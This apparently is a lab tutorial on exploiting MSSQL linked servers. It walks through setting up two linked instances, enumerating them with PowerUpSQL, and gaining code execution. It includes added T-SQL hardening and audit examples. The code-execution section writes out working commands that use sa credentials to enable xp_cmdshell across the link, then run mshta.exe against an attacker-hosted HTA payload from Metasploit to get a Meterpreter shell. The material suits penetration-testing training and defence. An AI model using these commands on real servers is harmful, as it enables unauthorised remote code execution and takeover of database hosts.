Abusing Linked Database - MSSQL - Hacking

Uploaded by Leonardo Zarate

Contents

Introduction to Link Servers
Lab Set-Up
Exploiting Link Server
  Enumeration
  Code Execution

Introduction to Link Servers
A linked server acts as a bridge between two servers. Through a link, a database on one server can be
viewed, shared or edited by two or more servers that have access to it, and data from tables on both sides
can be joined and queried through it. Linked servers are designed for applications that need more
flexibility over how data is stored and retrieved. Whether the application uses parallel processing, ad hoc
queries, or joins between multiple Microsoft Access files, a linked server provides a better platform for
flexible application development. Data from multiple sources can be added to one table or appended to
existing data. You can use a linked server in place of an ordinary table, much as you might when you make
a copy of an existing database table. The following things can be done via a linked server:

- Control query plans
- Change column data type
- Optimize queries on the remote server
- Change plan for the local table
- Access remote table data
- Delete objects on the local database
- Change server used to access local tables
- Reconnect to a linked server
- Use replicated parameters
- Allow remote updates

Lab Set-Up
We will first set up a linked server. When MSSQL Server is installed, a default instance is created on its
own, but we need a second instance so that we can link the two. To create it, launch the installer again and
choose New SQL Server stand-alone installation or add features to an existing installation, as shown in
the image below:

Then click on the Next button as shown in the image below:

In the next window of the dialogue box, select Perform a new installation of SQL Server 2016 and then
click on the Next button as shown in the image below:

In the Feature Selection dialogue box, choose the features you want to install and give the path of your
instance. Afterward, click on the Next button as shown in the image below:

In the Instance configuration dialogue box, give the name of the server and click on the Next button as
shown in the image below:

In the Server Configuration dialogue box, make sure the startup is automatic, and then click on
the Next button as shown in the image below:

In the Database Engine Configuration dialogue box, select Mixed Mode under Authentication Mode and
give the password for your server. Click on the Next button as shown in the image below:

Click on the Close button, as the installation is now complete, as shown in the image below:

Now to connect to the server, choose the <Browse for more…> option in the drop-down menu
of Authentication as shown in the image below:

Choose your server and click on the OK button as shown in the image below:

Now, as you can see in the image below, we have our two servers.

Now go to the main server > Server Objects > Linked Servers. Right-click on Linked Servers and
choose the New Linked Server… option from the drop-down menu as shown in the image below:

In the Linked Server field, give the name of the server you want to link. Under Server Type, choose
Other data source. Choose Microsoft OLE DB Provider for SQL Server from the Provider drop-down
menu. Give your default server as the Data source and give the database name in the Catalog. Finally,
click on the OK button as shown in the image below:

In the Server Options, make sure RPC and RPC Out are true, as shown in the image below:

In the Security tab, give the username and password of your default server, then click on the OK button
as shown in the image below:

After all this, your linked server will be created as shown in the image below:
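The same linked server, expressed in T-SQL so the settings chosen in the dialogues above are visible in one place. This is an added example, not code from the original article: the first part reproduces the lab set-up exactly as configured (catch-all mapping to the remote sa with a static password, RPC and RPC Out on), the second part shows the least-privilege equivalent. The link name LINK_SQLEXPRESS, the local login app_reporting and the remote login linkreader are assumed names; the instance name and sa password are the ones the article uses.

```sql
-- Weak set-up: what the GUI steps above produce (LINK_SQLEXPRESS is an assumed name)
EXEC master.dbo.sp_addlinkedserver
     @server     = N'LINK_SQLEXPRESS',
     @srvproduct = N'',
     @provider   = N'SQLOLEDB',                  -- "Microsoft OLE DB Provider for SQL Server"
     @datasrc    = N'WIN-P83OS778EQK\SQLEXPRESS', -- Data source from the article
     @catalog    = N'master';
-- Security tab: every local login (@locallogin = NULL) is mapped to the remote sa with a stored password
EXEC master.dbo.sp_addlinkedsrvlogin
     @rmtsrvname  = N'LINK_SQLEXPRESS',
     @useself     = 'false',
     @locallogin  = NULL,
     @rmtuser     = N'sa',
     @rmtpassword = N'Password@1';
-- Server Options tab: RPC and RPC Out = True, so procedures can be executed on the remote side through the link
EXEC master.dbo.sp_serveroption @server = N'LINK_SQLEXPRESS', @optname = 'rpc',     @optvalue = 'true';
EXEC master.dbo.sp_serveroption @server = N'LINK_SQLEXPRESS', @optname = 'rpc out', @optvalue = 'true';

-- Hardened equivalent: drop the catch-all mapping, map only the one local login that needs the link
-- to a low-privileged remote login (assumed: linkreader holds db_datareader on the catalog only),
-- and leave RPC Out off unless a specific remote procedure is genuinely required
EXEC master.dbo.sp_droplinkedsrvlogin @rmtsrvname = N'LINK_SQLEXPRESS', @locallogin = NULL;
EXEC master.dbo.sp_addlinkedsrvlogin
     @rmtsrvname  = N'LINK_SQLEXPRESS',
     @useself     = 'false',
     @locallogin  = N'app_reporting',            -- assumed local login that actually uses the link
     @rmtuser     = N'linkreader',               -- assumed low-privileged remote login
     @rmtpassword = N'<strong-password-placeholder>';
EXEC master.dbo.sp_serveroption @server = N'LINK_SQLEXPRESS', @optname = 'rpc out', @optvalue = 'false';
```

With the hardened mapping, logins other than app_reporting get no remote identity at all, so a compromised local login cannot ride the link into the second instance.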

Exploiting Link Server
Enumeration
Now our linked server is up and ready. As an attacker, we know nothing about the server. So, to enumerate
the linked server, we will use PowerUpSQL with the following commands:

Import-Module .\PowerUpSQL.ps1
Get-SQLServerLink -Username sa -Password Password@1 -Instance WIN-P83OS778EQK\SQLEXPRESS -Verbose

As you can see in the image above, we have an instance name, linked server name, and catalogue name,
among other helpful information.

Code Execution
Now, to remotely gain access to the linked server, we will use PowerUpSQL and Metasploit. These two
tools have proved to be the best tools when it comes to attacking MSSQL servers.
Before we deploy these tools, we can go to Facets > Surface Area Configuration and confirm that
xp_cmdshell is disabled, as shown in the image below:

Now, we will enable xp_cmdshell through the link by using the following PowerUpSQL command:

Get-SQLServerLinkCrawl -Username sa -Password Password@1 -Instance WIN-P83OS778EQK\SQLEXPRESS -Query "EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;')"

Now that xp_cmdshell is enabled, we will use Metasploit to generate a URL with the hta_server module,
using the following set of commands:

use exploit/windows/misc/hta_server
set srvhost eth0
exploit

We have our URL. Now, we will run it via PowerUpSQL so that we get our Meterpreter session. To
launch the said URL, use the following command:

Get-SQLServerLinkCrawl -Username sa -Password Password@1 -Instance WIN-P83OS778EQK\SQLEXPRESS -Query "exec master..xp_cmdshell 'mshta.exe http://192.168.1.2:8080/ugfFOJBvO.hta' "

Once the command is executed successfully, we will have our meterpreter session as shown in the image
below:

In such a simple way, a linked server can be exploited to hand a session to an attacker.
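To check an instance for the conditions this walkthrough relies on (a link mapped to sa or to a stored credential for every login, RPC Out on, xp_cmdshell enabled), the following T-SQL audit is added here; it is not part of the original article. It uses only the standard catalog views sys.servers, sys.linked_logins, sys.server_principals and sys.configurations, and is run on the server that holds the link.

```sql
-- 1. Every linked server with its login mappings and RPC settings, plus a first-match finding column
SELECT  s.name                      AS linked_server,
        s.provider,
        s.data_source,
        s.catalog,
        s.is_rpc_out_enabled,                       -- 1 = "RPC Out" true, remote procedure execution allowed
        s.is_remote_login_enabled,
        CASE WHEN ll.local_principal_id = 0
             THEN '(all logins)'                    -- local_principal_id 0 is the catch-all default mapping
             ELSE p.name END        AS local_login,
        ll.uses_self_credential,                    -- 1 = impersonate caller, 0 = stored remote credential
        ll.remote_name,
        CASE WHEN ll.remote_name = N'sa'
                  THEN 'link authenticates as remote sa'
             WHEN ll.local_principal_id = 0 AND ll.uses_self_credential = 0
                  THEN 'stored credential applies to every local login'
             WHEN s.is_rpc_out_enabled = 1
                  THEN 'RPC Out enabled'
             ELSE '' END            AS finding
FROM    sys.servers             AS s
JOIN    sys.linked_logins       AS ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS p  ON p.principal_id = ll.local_principal_id
WHERE   s.is_linked = 1
ORDER BY s.name;

-- 2. Is xp_cmdshell enabled on this instance? value_in_use = 1 means yes
SELECT  name, value_in_use
FROM    sys.configurations
WHERE   name = N'xp_cmdshell';
```

Run the same two queries on each instance a link points to as well, since the second query only reports the local xp_cmdshell state and a chain of links is only as strong as its weakest hop.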
Reference:
https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-link-crawling-powerupsql/

www.ignitetechnologies.in